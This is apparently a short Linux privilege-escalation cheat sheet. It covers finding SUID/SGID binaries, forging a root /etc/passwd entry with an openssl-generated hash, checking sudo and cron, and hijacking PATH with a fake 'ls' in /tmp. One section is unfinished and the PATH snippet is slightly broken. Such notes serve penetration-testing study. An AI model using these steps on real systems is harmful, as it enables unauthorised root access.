- SUID:
rws-rwx-rwx - GUID:
rwx-rws-rwx
find "$DIRECTORY" -perm /4000 # SUID
find "$DIRECTORY" -perm /u=s # SUID
find "$DIRECTORY" -perm /2000 # SGID
find "$DIRECTORY" -perm /g=s # SGID
find "$DIRECTORY" -perm /6000 # SGID + SUID
find "$DIRECTORY" -perm /u=s,g=s # SGID + SUID- Line format
username:password:uid:gid:info:home:shell
- Example line
admin:x:0:0:root:/root:/bin/bash
- Generate password hash
openssl passwd -1 -salt [salt] [password]
sudo -lTODO: This part is not finished yet
- View scheduled cron jobs
cat /etc/crontab
- Cronjob format
| keyword | meaning |
|---|---|
| # | ID |
| m | Minute |
| h | Hour |
| dom | Day of the month |
| mon | Month |
| dow | Day of the week |
| user | What user the command will run as |
| command | What command should be run |
# m h dom mon dow user command
17 * 1 * * * root cd / && run-parts --report /etc/cron.hourly
Rewrite the PATH variable to point to an imitating executable that is being called within a script with SUID privileges.
echo $PATH
cd /tmp
echo "/bin/bash/" > ls
chmod +x ls
export PATH=/tmp:$PATH- https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
- https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
- https://payatu.com/guide-linux-privilege-escalation